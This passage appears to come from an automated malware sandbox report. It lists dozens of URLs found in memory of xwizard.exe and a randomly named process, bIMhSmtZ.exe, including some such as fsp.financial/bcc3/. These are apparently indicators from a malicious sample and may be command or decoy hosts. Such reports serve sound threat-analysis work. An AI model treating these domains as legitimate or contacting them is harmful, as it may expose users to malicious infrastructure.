                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.diehuzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.djpaul.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.doudouzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.eartharts.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.elecsa.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fentaozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.firstmusic.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.formaplus.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.forsyte.net
                Source: bIMhSmtZ.exe, 0000000A.00000002.3091843748.00000000053A7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fsp.financial
                Source: bIMhSmtZ.exe, 0000000A.00000002.3091843748.00000000053A7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fsp.financial/bcc3/
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fundcurve.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.genesisenergy.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huayangzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huayuzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inspiremusic.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jianhuozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jianmanzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jisezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jiuxiuzhi.net
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jiuyezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kanbzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kazimierz.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kintra.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ladyx.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lailiaozhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.laimizhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.leatherfactory.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lihuazhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linglingzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.longlash.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovevintage.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxbrand.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maituzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mamaizhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mamaizhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mamaizhibo.net/binding
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meipaizhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mierzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mishangzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mishizhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mituzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.monitorit.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naturalelement.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naturequeen.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.newtalents.net/binding
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.niled.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oberstaufen.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.physicare.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pionner.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qigezhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qimiaozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.radiodrama.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.remedis.net
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.s8zhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sequzhibo.net/binding
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.smartvisions.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.spacebuilders.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stonemonkey.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.summergames.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taoxingzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thisit.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tigersystems.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.togethertime.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.twistedlemon.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.victoriatravel.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.webcruiser.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.womenstrikeus.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiangxiangzhibo.net/binding
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaocaozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoniuzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xinxiuzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunaizhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechunzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yekezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yimozhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingxiangzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingyingzhibo.net/binding
